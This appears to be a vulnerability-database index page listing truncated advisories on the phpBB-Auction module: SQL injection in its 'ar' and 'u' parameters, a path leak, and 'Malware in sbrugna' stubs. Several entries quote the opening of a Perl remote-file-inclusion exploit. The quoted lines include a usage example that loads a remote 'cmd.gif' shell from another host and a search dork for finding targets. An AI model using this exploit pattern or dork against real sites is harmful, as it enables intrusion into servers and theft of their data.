EUVD-2006-3933

Malware in sbrugna...

EUVD-2005-1238

Malware in sbrugna...

EUVD-2005-1237

Malware in sbrugna...

phpbb-auction 1.x auction_room.php ar Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. These vulnerabilities could permit remote...

phpbb-auction 1.x auction_store.php u Parameter SQL Injection

No description provided by source. source: http://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. These vulnerabilities could permit remote...

PHPBB-Auction Module 1.0/1.2 Auction_Offer.PHP SQL Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/13284/info phpbb-auction module is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitati...

CVE-2006-3940

Multiple SQL injection vulnerabilities in phpbb-Auction allow remote attackers to execute arbitrary SQL commands via 1 the ar parameter in auctionroom.php and 2 the u parameter in auctionstore.php. NOTE: the auctionrating.php vector is already covered by CVE-2005-1234. NOTE: the original disclosu...

CVE-2006-3940

Multiple SQL injection vulnerabilities in phpbb-Auction allow remote attackers to execute arbitrary SQL commands via 1 the ar parameter in auctionroom.php and 2 the u parameter in auctionstore.php. NOTE: the auctionrating.php vector is already covered by CVE-2005-1234. NOTE: the original disclosu...

CVE-2006-3940

CVE-2006-3940 concerns multiple SQL injection vulnerabilities in the phpbb-Auction package. The affected components, as described in the provided documents, allow remote attackers to execute arbitrary SQL commands via the following parameters: (1) ar in auction_room.php and (2) u in auction_store...

phpBB-Auction 1.x - 'auction_room.php?ar' SQL Injection

source: https://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. These vulnerabilities could permit remote attackers to pass malicious input...

phpBB-Auction 1.x - 'auction_store.php?u' SQL Injection

source: https://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. These vulnerabilities could permit remote attackers to pass malicious input...

phpBB-Auction 1.x - auction_room.php?ar SQL Injection

phpBB-Auction 1.x - auctionroom.php?ar SQL Injection source: https://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. These vulnerabilities...

phpBB-Auction 1.x - auction_store.php?u SQL Injection

phpBB-Auction 1.x - auctionstore.php?u SQL Injection source: https://www.securityfocus.com/bid/19179/info PHPBB-Auction is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. These vulnerabilities...

Auction 1.3m - phpbb_root_path Remote File Inclusion

Auction 1.3m - phpbbrootpath Remote File Inclusion !/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd...

Auction <= 1.3m (phpbb_root_path) Remote File Include Exploit

Exploit for unknown platform in category web applications ============================================================= Auction perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1;...

Auction 1.3m - &#039;phpbb_root_path&#039; Remote File Inclusion

!/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click perl wb1.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path =...

Auction &lt;= 1.3m (phpbb_root_path) Remote File Include Exploit

No description provided by source. !/usr/bin/perl phpBB auction mod - Remote File Inclusion Vuln Bug discovered by VietMafia code copier: webDEViL w3bd3vilatgmail.com code same as Fast Click = 2.3.8 Remote File Inclusion exploit dork: intext:"phpbb - auction" inurl:"auction" usage: perl wb1.pl...

CVE-2005-1234

Multiple SQL injection vulnerabilities in phpbb-Auction allow remote attackers to execute arbitrary SQL commands via the 1 u parameter to auctionrating.php or 2 ar parameter to actionoffer.php...

CVE-2005-1235

auctionmyauctions.php in phpbb-Auction 1.2m and earlier allows remote attackers to obtain sensitive information via an invalid mode parameter, which leaks the full path in a PHP error message...

CVE-2005-1234

Multiple SQL injection vulnerabilities in phpbb-Auction allow remote attackers to execute arbitrary SQL commands via the 1 u parameter to auctionrating.php or 2 ar parameter to actionoffer.php...